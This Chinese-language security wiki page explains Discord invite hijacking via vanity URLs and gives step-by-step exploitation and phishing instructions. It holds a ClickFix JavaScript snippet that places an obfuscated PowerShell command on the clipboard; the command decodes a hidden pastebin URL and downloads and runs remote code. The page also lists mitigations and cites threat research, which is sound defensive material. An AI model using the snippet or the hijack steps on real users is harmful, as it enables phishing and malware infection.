Discord 邀请劫持

Discord 的邀请系统漏洞允许威胁行为者声称过期或删除的邀请代码（临时、永久或自定义虚荣）作为任何 Level 3 提升服务器上的新虚荣链接。通过将所有代码标准化为小写，攻击者可以预先注册已知的邀请代码，并在原始链接过期或源服务器失去提升后静默劫持流量。

邀请类型和劫持风险

利用步骤

1. 侦察

• 监控公共来源（论坛、社交媒体、Telegram 频道）以寻找匹配模式 discord.gg/{code} 或 discord.com/invite/{code} 的邀请链接。
• 收集感兴趣的邀请代码（临时或虚荣）。

2. 预注册

• 创建或使用一个具有 Level 3 Boost 权限的现有 Discord 服务器。
• 在 服务器设置 → 虚荣 URL 中，尝试分配目标邀请代码。如果被接受，该代码将被恶意服务器保留。

3. 劫持激活

• 对于临时邀请，等待原始邀请过期（或如果您控制源，则手动删除它）。
• 对于包含大写字母的代码，可以立即声明小写变体，尽管重定向仅在过期后激活。

4. 静默重定向

• 一旦劫持激活，访问旧链接的用户将无缝地被发送到攻击者控制的服务器。

通过 Discord 服务器的钓鱼流程

1. 限制服务器频道，使只有 #verify 频道可见。
2. 部署一个机器人（例如，Safeguard#0786）提示新来者通过 OAuth2 进行验证。
3. 机器人将用户重定向到一个钓鱼网站（例如，captchaguard.me），伪装成 CAPTCHA 或验证步骤。
4. 实施 ClickFix 用户体验技巧：

• 显示一个损坏的 CAPTCHA 消息。
• 指导用户打开 Win+R 对话框，粘贴预加载的 PowerShell 命令，然后按 Enter。

ClickFix 剪贴板注入示例

// Copy malicious PowerShell command to clipboard
const cmd = `powershell -NoExit -Command "$r='NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa';` +
`$u=($r[-1..-($r.Length)]-join '');` +
`$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));` +
`iex (iwr -Uri $url)"`;
navigator.clipboard.writeText(cmd);

这种方法避免了直接下载文件，并利用熟悉的用户界面元素来降低用户的怀疑。

缓解措施

• 使用包含至少一个大写字母或非字母数字字符的永久邀请链接（永不过期，不可重复使用）。
• 定期更换邀请代码并撤销旧链接。
• 监控 Discord 服务器的提升状态和虚荣 URL 声明。
• 教育用户验证服务器的真实性，并避免执行剪贴板粘贴的命令。

参考文献

• 从信任到威胁：被劫持的 Discord 邀请用于多阶段恶意软件交付 – https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/
• Discord 自定义邀请链接文档 – https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link